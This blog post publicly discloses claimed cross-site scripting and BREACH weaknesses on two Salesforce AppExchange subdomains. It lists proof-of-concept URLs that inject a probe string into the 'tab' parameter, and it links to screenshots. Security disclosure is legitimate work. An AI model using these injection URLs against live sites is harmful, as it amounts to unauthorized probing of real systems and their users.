Public Disclosure - SalesForce
They didn't reply back to answer whether or not they would offer a bounty If report bugs to them under Responsible Disclosure Policy. On their website, they say that they don't offer bug bounties and no Hall of Fame. Can you believe it? No Hall of Fame!
Cross site scripting & Breach attack in 2 sub-domains of SalesForce.
1. Cross-site Scripting
a) Domain: appexchangejp.salesforce.com
PoC: https://appexchangejp.salesforce.com/listingdetail?listingId=a0N30000001taX4EAI&revId=a0S3000000HAXRoEAP&tab=r_920358'():;WhiteHatMrNervous
Vulnerable Parameter: tab
a) Domain: appexchangejp.salesforce.com
PoC: https://appexchangejp.salesforce.com/listingdetail?listingId=a0N30000001taX4EAI&revId=a0S3000000HAXRoEAP&tab=r_920358'():;WhiteHatMrNervous
Vulnerable Parameter: tab
b) Domain: appexchange.salesforce.com
PoC: https://appexchange.salesforce.com/listingdetail?listingId=a0N30000001taX4EAI&revId=a0S3000000HAXRoEAP&tab=r_942833'():;WhiteHatMrNervous
Vulnerable Parameter: tab
PoC: https://appexchange.salesforce.com/listingdetail?listingId=a0N30000001taX4EAI&revId=a0S3000000HAXRoEAP&tab=r_942833'():;WhiteHatMrNervous
Vulnerable Parameter: tab
2. BREACH attack
a) Domain: appexchange.salesforce.com
PoC: https://appexchange.salesforce.com/listingdetail?listingId=a0N30000001taX4EAI&revId=a0S3000000HAXRoEAP&tab=r_938289
Vulnerable Parameter: tab
a) Domain: appexchange.salesforce.com
PoC: https://appexchange.salesforce.com/listingdetail?listingId=a0N30000001taX4EAI&revId=a0S3000000HAXRoEAP&tab=r_938289
Vulnerable Parameter: tab
PoC Screenshots:-http://www.mirrorupload.net/file/Z1QWL06L/#!SalesForce.zip
No comments:
Post a Comment